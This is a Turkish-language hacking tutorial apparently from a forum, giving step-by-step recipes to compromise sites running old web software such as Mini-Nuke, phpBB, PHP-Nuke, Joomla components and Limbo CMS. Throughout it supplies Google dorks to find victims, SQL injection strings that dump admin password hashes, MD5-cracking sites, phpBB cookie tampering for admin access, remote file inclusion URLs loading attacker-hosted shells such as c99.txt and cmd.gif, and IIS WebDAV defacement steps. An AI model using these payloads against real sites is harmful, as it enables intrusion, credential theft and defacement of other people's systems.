HANGİ SİTE NASIL HACKLENİR ??

MİNİ NUKE V2.3Mini nuke sitelerle uğraşmak için ilk öncewwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.Karşımıza gelen sitelerin sonuna:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.MD5 i kırmak içindehttp://passcrack.spb.ru http://gdataonline.comhttp://us.md5.crysm.nethttp://md5.rednoize.comhttp://ice.breaker.free.frhttp://www.milw0rm.com/md5/http://shm.hard-core.pl/md5/http://www.hashchecker.comhttp://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/http://md5.benramsey.comhttp://md5.altervista.orghttp://shm.hard-core.plhttp://plain-text.infohttp://www.md5lookup.comhttp://www.passcracking.ruhttp://www.md5lookup.comhttp://www.passcracking.ru/http://www.securitystats.com/tools/hashcrack.php----------------------------------------------------------------------------VİRTUAL WAR V.1.0ilk önce www.google.com ’Powered by: Virtual War v1.5.0’Sonu /war.php olan siteleri seçiyoruz vewar.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.Artık admin palenelindeyiz[Eski bir açık olduğu için sonuç alamayabilirsiniz]-------------------------------------------------------------------------------PHPBB 2.0.11işte meşhur phpbb açığıBize gereken en önemli program :http://www.topshareware.com/cookie-E...nsfer-4659.htm [Cooike Editör]Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasındankurban phpbb 2.0.11 sitemizi seçicez.Sitemizi bulduk 2 kez tıklıyoruz.Önümüze a%3A2%3A%7Bs%3A11%3A"autolog inid"%3Bs%3A0%3A%2 2"%3Bs%3A6%3A"userid"%3B s%3A1%3A"2"%3B%7D Gibi AbudikKubidik Kodlar Gelicek Üssteki Kodu Slipa%3A2%3A%7Bs%3A11%3A"autolog inid"%3Bb%3A1%3Bs% 3A6%3A"userid"%3Bs%3A1%3A% 222"%3B%7D Bu kodu yeryeştiriyoruzSaveliyoruz.Artık cooike editör ile işimiz bittiSitemizi yeniliyoruz bakıyoruz aaaa adminiz---------------------------------------------------------------------------------PHP NUKE SQL INJECTİONwww.googLe.com a giriyoruz aranacak kelimeye’PHP-Nuke Copyright © 2004 by Francisco Burzi’ yazıyoruz.Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafiSearch bölümünü bulamadıysanızwww.hackleneceksite.com/modules.php?name=SearchAdminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.----------------------------------------------------------------------------------COM_REMOSİTORYwWW.Google.com ’’inurl:"com_remository"Bulduğumuz sitelere/[joomlapat....php?mosConfig]http://[sitepath]/[joomlapat....php?mosConfig _absolute_path=http://site/phpshell.phpKodunu ekliyoruz...---------------------------------------------------------------------------------------XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİTWWW.Google.Com ’inurl:modules/myAds/’Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.http://www.site.com/modules/myAds/an...rs+limit+1*1/*Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...-----------------------------------------------------------------------------------------TOPLİST HACK PHPBBGoogLe Arama : inurl:"toplist.php" "powered by phpbb"Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls------------------------------------------------------------------------------------------ PC_COOKBOOK JOOMLA COMPONENT- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities- Author: JaheeMCreW- Uygulama : pc_cookbook Component- Version : koyans 0.3Yapmaniz gereken bir arama moturunda örnek google’ da" allinurl:com_pccookbook " olarak aratmaktir..Exploit :/[path]/compo...osConfig_absol]http://[target]/[path]/compo...osConfig_absol ute_path=http://evilscript-----------------------------------------------------------------------------------------SİMPLE BOARD MAMBOİlk Önce WwwW.GoogLe.comDaha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...http://site.com/components/com_simpl...me%20-a;id;pwd-----------------------------------------------------------------------------------------ShoutBox IncLusionshoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...Code:/shoutbox/expanded.php?conf=GoogLe Arama : inurl:"/shoutbox/expanded.php?"------------------------------------------------------------------------------------------PHPBAZAR <= 2.1.0 Remote File INCLLUSIONGoogle Search=inurl:classified.php phpbazarhttp://hedefsite.com/classified_righ...ell.txt?cmd=id-------------------------------------------------------------------------------------------BoastMachine [bmachine]yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca admininşifresini görüyoruz : )--------------------------------------------------------------------------------------------Limbo CMS <= 1.04 Remote File InclusionGoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls---------------------------------------------------------------------------------------------CaLogic Calendars V1.2.2 - Remote File IncludeGoogLe Arama : CaLogic Calendars V1.2.2kullanmak için :/reconfig....1;evil_script]]http://site.com/[path]/reconfig....1;evil_script]/srxclr.ph...1;evil_script]]http://site.com/[path]/srxclr.ph...1;evil_script]----------------------------------------------------------------------------------------------PafileDB Remote File Inclusion [phpBB]PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= ]http://[attacker]-----------------------------------------------------------------------------------------------JetBox CMS Remote File Include [ RFI ]Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..Uretici Firma : http://jetbox.streamedge.com/JetBox CMS Remote File Include]http://[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..GoogLe arama : Powered by Jetbox------------------------------------------------------------------------------------------------Aratma Kodu : PHP Upload Center v2.0Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt? Çok KaRışık biLiyOrum Ama DikkatLi Okuyun.. 1.YönTem bu kodu başLaT//ÇaLıştıRa KopyaLayıp YapışTırın..%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F} enTere BaSın.2.YönTem : AcıLan Web SayFaSna Saq TıkLıyıP Yeni // Web KLasöRü YaRaTın..YaraTTıkTan SonRa..3.YönTem : www.google.com 'qiRin Aynen ŞöyLé Yazın iSS Acıqı oLan SiteLer Çıkan Sitelerden bulabiLirsiniz İss Acıqı oLanı Bn 3-5 Tane YazıCam BuRaya OnLArDanda YaRarLanabiLirSiniz İndexinizi BaSabiLirSiniz Her NéySéé..! siteyide buLduk DieeLim AçTıqımız Web KLaSöRüne Siteyi YapışTırıyOruzSonRada iLeriyi TıkLıyOruz Bitince Son'u TıkLAyıp oLuSan Web kLaSöRünü Acıp İndexi İçine AtıyOrSunuzVe Site Sizin TaRaFınızDan HackLEnmiş oLuyO..İyi HackLemeLer..))